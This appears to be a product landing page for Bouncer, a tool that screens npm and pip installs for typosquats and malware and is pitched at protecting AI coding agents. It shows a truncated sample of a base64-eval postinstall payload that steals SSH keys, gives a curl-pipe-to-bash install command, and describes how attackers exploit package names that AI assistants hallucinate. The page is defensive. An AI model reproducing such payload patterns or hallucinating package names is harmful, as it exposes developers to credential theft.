Block your AI agents from
installing malicious packages

✓ Bouncer continuously audits every package on npm and PyPI for malware
✓ The free CLI warns you about risky packages using basic heuristics
✓ Upgrade to Cloud AI for real-time audit coverage for only $9/mo

bouncer npm

$ npm install colros
🟡 npm install colros intercepted by Bouncer
  Possible typosquat of "colors"
  Did you mean: colors (52M weekly downloads)
  1) Abort (recommended)
  2) View audit on bouncer.sh
  3) Proceed anyway

Install

Get protected in 30 seconds:

$ curl -fsSL https://bouncer.sh/install | bash

Audits npm & pip · macOS & Linux · No signup required

Your dependencies are the largest unguarded attack surface

120,612 malicious packages were published in Q4 2025 alone. Typosquatting, dependency confusion, and install script attacks are the fastest growing threat to developers.

Bouncer checks every package name against known threats, flags typosquats, and inspects install scripts before anything runs on your machine.

bouncer pip

$ pip install reqeusts
🔴 pip install reqeusts intercepted by Bouncer
  Known malicious package
  Steals environment variables and credentials
  Confidence: HIGH
  1) Abort (recommended)
  2) View audit on bouncer.sh
  3) Proceed dangerously

No need to change your workflow

Enable bouncer once and every npm and pip install is automatically screened. Your AI agents can't be tricked into installing malware.

Manual

Add bouncer in front of any command to screen it before execution.

$ bouncer npm install sketchy-pkg

🔴 npm install sketchy-pkg intercepted by Bouncer

RECOMMENDED

Auto (default)

Wrap every npm and pip install automatically. Your AI agents can't sneak malware past bouncer.

$ bouncer enable
✓ npm, pip now route through Bouncer
$ npm install sketchy-pkg
🔴 npm install sketchy-pkg intercepted by Bouncer

You're one bad install away from getting owned

This isn't theoretical. Crypto wallets are getting drained. Credentials are getting stolen.
Bouncer prevents attacks like these before it's too late.

PhantomRaven

npm

126 npm packages published with infostealers hidden in postinstall scripts. Targeted SSH keys, browser passwords, and crypto wallets.

LiteLLM attack

pip

A poisoned version of litellm (97M downloads/mo) exfiltrated SSH keys, cloud creds, and crypto wallets. Even more were compromised via transitive dependency.

Slopsquatting

vibe coding

AI code assistants hallucinate package names. Attackers register those names with malicious code. Your AI writes the import, you install the malware.

Real-time auditing of every dependency

The free CLI catches the obvious stuff. Bouncer Cloud AI catches everything else.

Every package you install gets reviewed by AI that reads the actual source code, looking for obfuscated exfiltration, hidden backdoors, and novel attack patterns that no signature database has seen yet. Bouncer also walks the full dependency tree, scanning every runtime dependency up to 10 levels deep so threats buried in transitive deps don't slip through.

Packages are scanned within seconds of being published, giving you real-time protection without any performance hit.

AI audit

$ npm install cool-utils
🔴 npm install cool-utils intercepted by Bouncer
  Suspicious patterns detected in postinstall
  eval(Buffer.from('aHR0cDov...', 'base64'))
  Base64-encoded eval executes hidden network request
  Sends ~/.ssh/* to external endpoint
  Confidence: HIGH
  No known signature -- caught by AI analysis
  1) Abort (recommended)
  2) View audit on bouncer.sh
  3) Proceed dangerously

Free CLI

$0/mo

✓ Typosquatting detection
✓ Metadata heuristics (age, publisher, downloads)
✓ Install script red flags (eval+base64, exfil URLs)

Install CLI

STRONGER PROTECTION

Cloud AI

$9/mo

✓ Continuous AI audits of npm and pip package source code & install scripts
✓ Deep dependency scanning
✓ Catches novel attacks and zero-days
✓ Real-time threat detection
✓ Fewer false positives

Start 14-day free trial

Get protected in 30 seconds